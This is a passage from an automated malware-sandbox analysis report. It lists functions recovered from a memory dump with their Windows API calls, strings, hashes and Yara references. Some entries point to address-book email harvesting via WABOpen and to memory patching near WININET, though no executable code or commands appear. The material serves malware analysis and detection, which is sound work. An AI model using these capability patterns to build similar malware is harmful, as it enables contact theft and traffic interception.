CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 00CA3AE3

Part of subcall function 00C93828: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 00C93842
Part of subcall function 00C93828: CreateWaitableTimerA.KERNEL32(00CBE0D4,00000003,?), ref: 00C9385F
Part of subcall function 00C93828: GetLastError.KERNEL32(?,?,00CA3A3F,?,?,?,00000000,?,?,?), ref: 00C93870
Part of subcall function 00C93828: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00CA3A3F,?,?,?,00CA3A3F,?), ref: 00C938B0
Part of subcall function 00C93828: SetWaitableTimer.KERNEL32(00000000,00CA3A3F,00000000,00000000,00000000,00000000,?,?,00CA3A3F,?), ref: 00C938CF
Part of subcall function 00C93828: HeapFree.KERNEL32(00000000,00CA3A3F,00000000,00CA3A3F,?,?,?,00CA3A3F,?), ref: 00C938E5

GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 00CA3ACC
ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 00CA3AD5

Part of subcall function 00CAB01E: CreateMutexA.KERNEL32(00CBE0D4,00000000,?,?,00CA39EB,?,?,00000000,?,?,?), ref: 00CAB04E

GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 00CA3AF0

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
String ID:
API String ID: 1700416623-0
Opcode ID: e1e9e768b4b513d6c3bc47f9734e7fe13839bbc1d09b13ac19a0cefc8e5594f6
Instruction ID: bde2c3ac08e45529ca58867470d7431f3a57c19e813b6a0c1e24a86ce6770b08
Opcode Fuzzy Hash: e1e9e768b4b513d6c3bc47f9734e7fe13839bbc1d09b13ac19a0cefc8e5594f6
Instruction Fuzzy Hash: 9A31B675A00246AFCF10AFB4DC45A6E7BF9EB85344F140526F412D72A1EB70CE01DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CB220F, Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 00CB2228

Part of subcall function 00C93CA4: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,00CAF65A), ref: 00C93CCA

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00CA3EF5,00000000), ref: 00CB226A
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 00CB22BC
VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,00CA3EF5,00000000), ref: 00CB22D5

Part of subcall function 00CB45FE: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00CB461F
Part of subcall function 00CB45FE: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,00CB225B,00000000,00000000,00000000,00000001,?,00000000), ref: 00CB4662

GetLastError.KERNEL32(?,00000000,00CA3EF5,00000000), ref: 00CB230D

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
String ID:
API String ID: 1921436656-0
Opcode ID: 2b0ebf688b306e5205611402b092d5f72e2f06d26df736022f5dadf26c4eed8f
Instruction ID: 8ee2bcb8be0a1f94a600babd73c4e916326a4dab43115352aef390671000e2c4
Opcode Fuzzy Hash: 2b0ebf688b306e5205611402b092d5f72e2f06d26df736022f5dadf26c4eed8f
Instruction Fuzzy Hash: 29313D71A00209AFDF15DF95DC84BEE7BB8EF08350F100165E906EB261D7749E44DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA8291, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9C71D: lstrlen.KERNEL32(00000000,00000000,?,74785520,00CA82A5,00000000,00000000,00000000,74785520,?,00000022,00000000,00000000,00000000,?,?), ref: 00C9C729

RtlEnterCriticalSection.NTDLL(00CBE268), ref: 00CA82BB
RtlLeaveCriticalSection.NTDLL(00CBE268), ref: 00CA82CE
GetSystemTimeAsFileTime.KERNEL32(?), ref: 00CA82DF
RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00CA834A
InterlockedIncrement.KERNEL32(00CBE27C), ref: 00CA8361

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
String ID:
API String ID: 3915436794-0
Opcode ID: 81e551c339b124d5a169f81aae50abeab06e19fad12b8477b018f0241c38e74d
Instruction ID: 3d1283954845ed300eb5432a93784fa696ee669f4a0ee423f704f51010998e1e
Opcode Fuzzy Hash: 81e551c339b124d5a169f81aae50abeab06e19fad12b8477b018f0241c38e74d
Instruction Fuzzy Hash: 6E31B1719056069FCF24DF68D844B6AB7A8FF45B65F044A29F46683260CB30DD19CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C97365, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,74785520,?,?,00CA1386,00000000,?,?), ref: 00C97383
GetFileSize.KERNEL32(00000000,00000000,?,?,00CA1386,00000000,?,?,?,?,00000000,00C91589,?,00000000,?,00CA5B4A), ref: 00C97393
ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,00CA1386,00000000,?,?,?,?,00000000,00C91589), ref: 00C973BF
GetLastError.KERNEL32(?,?,00CA1386,00000000,?,?,?,?,00000000,00C91589,?,00000000,?,00CA5B4A,?,00000001), ref: 00C973E4
CloseHandle.KERNEL32(000000FF,?,?,00CA1386,00000000,?,?,?,?,00000000,00C91589,?,00000000,?,00CA5B4A,?), ref: 00C973F5

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: 0240a21057225983f503886a69105a733ddc05eb1a8195a1c6296471364d4a5b
Instruction ID: 62eccb7779be1737780f5fbd11cc5919a351e2651c258da5345481742d73ecd4
Opcode Fuzzy Hash: 0240a21057225983f503886a69105a733ddc05eb1a8195a1c6296471364d4a5b
Instruction Fuzzy Hash: CF11D272105215EFDF202F68DC8CBAE7A6DEB443A0F114325FE2597160D6708E449AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CB17F1, Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,64F16420,64F16420,?,00C9B0C6,?,?,?,00000000,?,?,00000001), ref: 00CB1802
StrRChrA.SHLWAPI(?,00000000,0000002F,?,00000000,64F16420,64F16420,?,00C9B0C6,?,?,?,00000000,?,?,00000001), ref: 00CB181B
StrTrimA.SHLWAPI(?,20000920,?,00000000,64F16420,64F16420,?,00C9B0C6,?,?,?,00000000,?,?,00000001,00000000), ref: 00CB1843
StrTrimA.SHLWAPI(00000000,20000920,?,00000000,64F16420,64F16420,?,00C9B0C6,?,?,?,00000000,?,?,00000001,00000000), ref: 00CB1852
HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,?,00000000,64F16420,64F16420,?,00C9B0C6,?,?,?), ref: 00CB1889

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Trim$FreeHeap
String ID:
API String ID: 2132463267-0
Opcode ID: 97f9be468e83b37df89fc647aafd71718a2cc71bbe5edf8f460b38ae6748d2a3
Instruction ID: 8c47057f135ac745b2293fb79e348200b7de888038bde7ef96c007d8240ce6c6
Opcode Fuzzy Hash: 97f9be468e83b37df89fc647aafd71718a2cc71bbe5edf8f460b38ae6748d2a3
Instruction Fuzzy Hash: D5119032200305BBDB219B99DC84FEB3BADFB09790F190121FA0997291EBB1DD40D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00CAFD52, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,00000004,00000040,?,00000000,?,?,00000000,00000000,?,00C9A4D6,00000000,00C9585F,00000000,00CBDEAC,00000008), ref: 00CAFD89
VirtualProtect.KERNEL32(00000000,00000004,?,?,?,00C9A4D6,00000000,00C9585F,00000000,00CBDEAC,00000008,00000003), ref: 00CAFDB9
RtlEnterCriticalSection.NTDLL(00CBE240), ref: 00CAFDC8
RtlLeaveCriticalSection.NTDLL(00CBE240), ref: 00CAFDE6
GetLastError.KERNEL32(?,00C9A4D6,00000000,00C9585F,00000000,00CBDEAC,00000008,00000003), ref: 00CAFDF6

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: cbc3445246dc3b7307266b09eec33ade2851c8e8c6b75ba06abcb073ada1b55c
Instruction ID: db4dd668d8eddeeb084b92458524ebae35ac956078dbfb87926301dce71f06e9
Opcode Fuzzy Hash: cbc3445246dc3b7307266b09eec33ade2851c8e8c6b75ba06abcb073ada1b55c
Instruction Fuzzy Hash: 6F2109B5600B02AFD714DFA9D980A8AB7F8FF09314B008629EA5697720D770FA04CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CA34B4, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 00CA34E2
GetLastError.KERNEL32 ref: 00CA3505
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CA3518
GetLastError.KERNEL32 ref: 00CA3523
HeapFree.KERNEL32(00000000,00000000), ref: 00CA356B

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
String ID:
API String ID: 1671499436-0
Opcode ID: 2df7e58c120edbaa37feea1ba9c77dbf82b40277eb30469ae036541d4a736b13
Instruction ID: 3feb026edbd4c23665e004935f7b7f5615a800cde4ecaceabde12f3ade32ab1c
Opcode Fuzzy Hash: 2df7e58c120edbaa37feea1ba9c77dbf82b40277eb30469ae036541d4a736b13
Instruction Fuzzy Hash: A121A170900285EBEB219B98EC9CB5E7BB8FB02358F240524F153965E0C775EF88DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00C9DD8D, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00CA6602,?,?,?,?,00000008,00CA6602,00000000,?), ref: 00C9DDAA
memcpy.NTDLL(00CA6602,?,00000009,?,?,?,?,00000008,00CA6602,00000000,?), ref: 00C9DDCC
RtlAllocateHeap.NTDLL(00000000,00000013), ref: 00C9DDE4
lstrlenW.KERNEL32(00000000,00000001,00CA6602,?,?,?,?,?,?,?,00000008,00CA6602,00000000,?), ref: 00C9DE04
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,00CA6602,00000000,?), ref: 00C9DE29

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
String ID:
API String ID: 3065863707-0
Opcode ID: 81c2848ea17c99ad73e879ca58a7953b562a97bfd92e2ff978dbfdecba735104
Instruction ID: 4403f68f47596d01cbf08d3ef7c9781eaca3d50002e6be9d00f230d38c94f418
Opcode Fuzzy Hash: 81c2848ea17c99ad73e879ca58a7953b562a97bfd92e2ff978dbfdecba735104
Instruction Fuzzy Hash: EB11B636D00208BBCF119BA4EC49FDE7FBCAB09354F004151FA1AE6291E670D608DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CAECB1, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00CB6C86,74785520,00C94BBD,?,?,?,00C915E5,?,?,00000000,?,00CA5B4A,?,00000001), ref: 00CAECBB

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

lstrcpy.KERNEL32(00000000,?), ref: 00CAECDF
StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,00C915E5,?,?,00000000,?,00CA5B4A,?,00000001), ref: 00CAECE6
lstrcpy.KERNEL32(00000000,4C003436), ref: 00CAED2E
lstrcat.KERNEL32(00000000,00000001), ref: 00CAED3D

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$AllocateHeaplstrcatlstrlen
String ID:
API String ID: 2616531654-0
Opcode ID: b35205fd89026650ba6b50696bc730d26f61e0adde158b864a6f0f3ae8c6b247
Instruction ID: c37474e2860b1fd23d54ec0fc30be0438f806a9c90f785bb5ba592be0a9387cd
Opcode Fuzzy Hash: b35205fd89026650ba6b50696bc730d26f61e0adde158b864a6f0f3ae8c6b247
Instruction Fuzzy Hash: 36118232604206ABD3209F69EC88F6F7BECAF85744F080529F619C7250EB70DA49DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00C9AA89, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9C71D: lstrlen.KERNEL32(00000000,00000000,?,74785520,00CA82A5,00000000,00000000,00000000,74785520,?,00000022,00000000,00000000,00000000,?,?), ref: 00C9C729

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00C9AAB2
memcpy.NTDLL(00000000,?,?), ref: 00C9AAC5
RtlEnterCriticalSection.NTDLL(00CBE268), ref: 00C9AAD6
RtlLeaveCriticalSection.NTDLL(00CBE268), ref: 00C9AAEB
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00C9AB23

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
String ID:
API String ID: 2349942465-0
Opcode ID: 3b1e93c5acda30101ec35ebf6a4c29524c80ab7a220cce505c0e67ad5f1a688d
Instruction ID: b7cd728e51ba02be13c0103cddd16e9cca6acc5017cd53eeac73d9915ad61b7d
Opcode Fuzzy Hash: 3b1e93c5acda30101ec35ebf6a4c29524c80ab7a220cce505c0e67ad5f1a688d
Instruction Fuzzy Hash: 7011E975105210AFDB156F24EC88FAF7B6CFB49361B01063AF81293251CA315C05DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00CAFE0E, Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00CAFE2E
GetModuleHandleA.KERNEL32 ref: 00CAFE3C
LoadLibraryExW.KERNEL32(?,?,?), ref: 00CAFE49
GetModuleHandleA.KERNEL32 ref: 00CAFE60
GetModuleHandleA.KERNEL32 ref: 00CAFE6C

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: HandleModule$LibraryLoad
String ID:
API String ID: 1178273743-0
Opcode ID: 7c6aba456728132ba69eade5c49865ef703acaeafa0b870469667eb5276df591
Instruction ID: 37861c07be852a9db848ee37699e3e498ecc5f51cce4e5858170216e34ca897a
Opcode Fuzzy Hash: 7c6aba456728132ba69eade5c49865ef703acaeafa0b870469667eb5276df591
Instruction Fuzzy Hash: 0601813170434A9BDB015FA9EC40B6E7BA9EF153A5B04013AF925C2171EBB1DD229FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA2AC4, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00CBE240), ref: 00CA2ACF
RtlLeaveCriticalSection.NTDLL(00CBE240), ref: 00CA2AE0
VirtualProtect.KERNEL32(?,00000004,00000040,0000000C,?,?,00CA0AA0,00CBD7A0,747857B0,00000000,00CA1E50,0000000C,00000000,?,0000000C,00000000), ref: 00CA2AF7
VirtualProtect.KERNEL32(?,00000004,0000000C,0000000C,?,?,00CA0AA0,00CBD7A0,747857B0,00000000,00CA1E50,0000000C,00000000,?,0000000C,00000000), ref: 00CA2B11
GetLastError.KERNEL32(?,?,00CA0AA0,00CBD7A0,747857B0,00000000,00CA1E50,0000000C,00000000,?,0000000C,00000000,WININET.dll), ref: 00CA2B1E

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: 3d70038b4492747a2511fb67aca8ae7a2eccfb418070d8b5539e8276542fdc95
Instruction ID: 26ad3d82610375c2ad2cfc94f90bc6585616c4985e51f19ed73391200cf85b89
Opcode Fuzzy Hash: 3d70038b4492747a2511fb67aca8ae7a2eccfb418070d8b5539e8276542fdc95
Instruction Fuzzy Hash: 29018F75200304AFD7219F29DC00E6AB7BDEF85764B148519EA5693360CB70E905CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00CA4E2B, Relevance: 7.5, APIs: 5, Instructions: 39synchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA51FB: InterlockedExchange.KERNEL32(00000002,000000FF), ref: 00CA5202

GetCurrentThreadId.KERNEL32 ref: 00CA4E43
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00CA4E53
CloseHandle.KERNEL32(00000000), ref: 00CA4E5C
VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,000000FF,000000FF,00CB0B37), ref: 00CA4E7A
VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,000000FF,000000FF,00CB0B37), ref: 00CA4E87

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: FreeVirtual$CloseCurrentExchangeHandleInterlockedObjectSingleThreadWait
String ID:
API String ID: 2588964033-0
Opcode ID: 0e84dd4a1b30f5609709885b4bde936954c8955689bfa16bf221f1f2b072bf48
Instruction ID: a897e354289332996e34c1708cf48dbe68b451fc8e47e57c184239441fe55489
Opcode Fuzzy Hash: 0e84dd4a1b30f5609709885b4bde936954c8955689bfa16bf221f1f2b072bf48
Instruction Fuzzy Hash: 8BF03771200B05AFDA30AB75EC48B5BB3ECBF89754F000A29B691925A0DB74EC08CA20

Uniqueness

Uniqueness Score: -1.00%

Function 00CA8B88, Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00C9A08D,?), ref: 00CA8B90
GetVersion.KERNEL32 ref: 00CA8B9F
GetCurrentProcessId.KERNEL32 ref: 00CA8BAE
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00CA8BCB
GetLastError.KERNEL32 ref: 00CA8BEA

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: f444e42a6ad23003fe5c9d42d425040d3e622732953fd59203e643386ef114f9
Instruction ID: 5b3b72dd6d868c0ee0600eab74634d902f64c3a9b76cfa01a52a39c0e44dd4c6
Opcode Fuzzy Hash: f444e42a6ad23003fe5c9d42d425040d3e622732953fd59203e643386ef114f9
Instruction Fuzzy Hash: 55F030B06883069FD310AF74BC49B5D3B69B705B41F10471AE116C51F0DFB08549DB39

Uniqueness

Uniqueness Score: -1.00%

Function 00CA2692, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185memoryCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,?,?,?,?), ref: 00CA2775
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,00C95E99), ref: 00CA27E7
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00CA27F8

Part of subcall function 00CA0158: RtlLeaveCriticalSection.NTDLL(?), ref: 00CA01D5

Strings

HTTP/1.1 404 Not Found, xrefs: 00CA276D

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCriticalFreeLeaveSectionmemcpy
String ID: HTTP/1.1 404 Not Found
API String ID: 4231733408-2072751538
Opcode ID: 4944bfcef3d1f847d635d804891a9d37d9b29ea4a8eb2d6f9e79010bc9453de3
Instruction ID: a4f1dd3f72572ece142cea4ad2e90b57bda208c52724bc22747e32369f531391
Opcode Fuzzy Hash: 4944bfcef3d1f847d635d804891a9d37d9b29ea4a8eb2d6f9e79010bc9453de3
Instruction Fuzzy Hash: DE618F31600617FFDB51DF69CA81BA9B7A5FF0A388F104029F915DAA51E771EE20DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00C9CD69, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74synchronizationCOMMON

Download Yara Rule

APIs

RtlUpcaseUnicodeString.NTDLL(?,?,00000001), ref: 00C9CD9D
RtlFreeAnsiString.NTDLL(?), ref: 00C9CE1D
WaitForSingleObject.KERNEL32(00000000), ref: 00C9CE2A

Strings

?@, xrefs: 00C9CE05

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: String$AnsiFreeObjectSingleUnicodeUpcaseWait
String ID: ?@
API String ID: 2603241602-3895805154
Opcode ID: 8874e5f8110c708fd621c92bd378f2f8d5c35d4a11cb3ecfaa20de4278114563
Instruction ID: 0de6eb76a2fa27df548a3e0598985b796794361c7d0c8d47bb97118853419f3a
Opcode Fuzzy Hash: 8874e5f8110c708fd621c92bd378f2f8d5c35d4a11cb3ecfaa20de4278114563
Instruction Fuzzy Hash: BF2101365082049BCF14DF64D8CCA6EB3A9FB44310F04492AF462C3160DB30DE58DBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00C98247, Relevance: 6.3, APIs: 5, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00C982D1
HeapFree.KERNEL32(00000000,?), ref: 00C982E2
HeapFree.KERNEL32(00000000,?), ref: 00C982FA
CloseHandle.KERNEL32(?), ref: 00C98314
HeapFree.KERNEL32(00000000,?), ref: 00C98329

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: d2b04fe466a20a769bf2e08d4509b431f88fac972f4d6f21a78ccf751e9a8ae2
Instruction ID: dfd1d1fe84e6b7caa3672ce143e78801d4a447c8fd02de05a6878c991f670559
Opcode Fuzzy Hash: d2b04fe466a20a769bf2e08d4509b431f88fac972f4d6f21a78ccf751e9a8ae2
Instruction Fuzzy Hash: 11314530201922AFCB159FA5DC8892EFBAAFF4AB143544510F419D7664CB31EDA6CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00C9880D, Relevance: 6.2, APIs: 4, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 00CAFC77: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 00CAFC92
Part of subcall function 00CAFC77: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 00CAFCE0
Part of subcall function 00CAFC77: GetProcAddress.KERNEL32(00000000,WABOpen), ref: 00CAFCF2
Part of subcall function 00CAFC77: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 00CAFD43

GetLastError.KERNEL32(?,?,00000001), ref: 00C9899B
FreeLibrary.KERNEL32(?,?,00000001), ref: 00C98A03

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
String ID:
API String ID: 1730969706-0
Opcode ID: a3268c3738afcc2418c582b611c739cdc27bb3c0467d106e6d37e1ea780110bd
Instruction ID: 8a62b258ec75d093aff0d494d1e18cb5c72835e74fc2ff63ae05ca7ea2c24c27
Opcode Fuzzy Hash: a3268c3738afcc2418c582b611c739cdc27bb3c0467d106e6d37e1ea780110bd
Instruction Fuzzy Hash: DD710771D0020AEFCF00DFE5C8889AEBBB9FF4A304B148569E516A7250DB35AE45CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00C94065, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00C94112
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00C94128
memset.NTDLL ref: 00C941C8
memset.NTDLL ref: 00C941D8

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 05e99d26d5a2aad05d979ce642108592280ef9117ab038958b931d32e569ab45
Instruction ID: 3702c2b78d66e6bbb44df2677b2b32d3f0b64ed6bdfa34468144cb1fcc731b7e
Opcode Fuzzy Hash: 05e99d26d5a2aad05d979ce642108592280ef9117ab038958b931d32e569ab45
Instruction Fuzzy Hash: 31411331A00259ABDF14DFA8DC45FEE77B4EF55320F008529F919AB181EB70AE459B90

Uniqueness

Uniqueness Score: -1.00%

Function 00CB5B53, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00CB839C,00CB837C,?,00000008), ref: 00CB5C93

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

Part of subcall function 00CA78AB: lstrlenW.KERNEL32(?,00000000,?,?,00000000,00C9FFD9,00000000), ref: 00CA78BC
Part of subcall function 00CA78AB: lstrlenW.KERNEL32(00CBA4C8,00000000,?,00000000,00C9FFD9,00000000), ref: 00CA78D3

Strings

EmailAddressCollection/EmailAddress[%u]/Address, xrefs: 00CB5C16
A8000A, xrefs: 00CB5B82
1.0, xrefs: 00CB5B7D

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateErrorHeapLast
String ID: 1.0$A8000A$EmailAddressCollection/EmailAddress[%u]/Address
API String ID: 3415590935-2884085418
Opcode ID: 0fb74f3c5e7a3db2e3690a3c6b4fcdc2e0c62def2391b8649b71bfa93bd23ddd
Instruction ID: b055608a8cf59526eca48031409d84ea44b74f52b4b93ca4e8f9f99847f7039d
Opcode Fuzzy Hash: 0fb74f3c5e7a3db2e3690a3c6b4fcdc2e0c62def2391b8649b71bfa93bd23ddd
Instruction Fuzzy Hash: 0F411C74A00705AFCB10DFA4C889FAEBBB9AF89705F144458F955EB251DB71DE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1395, Relevance: 6.1, APIs: 4, Instructions: 108synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00CA14B5

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

GetLastError.KERNEL32 ref: 00CA1429
WaitForSingleObject.KERNEL32(00000000), ref: 00CA1439
GetLastError.KERNEL32 ref: 00CA1459

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: 4eac87c60985f37228ec36fa6aa908aaf40670c89d8b8d9d379ebe0b83203757
Instruction ID: d39e2c23b8b811b1c9b3934f06b52cb57193ae9bbffa95118b6f58243d817fba
Opcode Fuzzy Hash: 4eac87c60985f37228ec36fa6aa908aaf40670c89d8b8d9d379ebe0b83203757
Instruction Fuzzy Hash: EE415C7090020AEFCF10DFA9D984AADBBB9FB09348F284469E952E7120D7709E44DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00C918E3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA06E2: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00CA0714
Part of subcall function 00CA06E2: HeapFree.KERNEL32(00000000,00000000,?,?,00CA1F8A,?,00000022,00000000,00000000,00000000,?,?), ref: 00CA0739

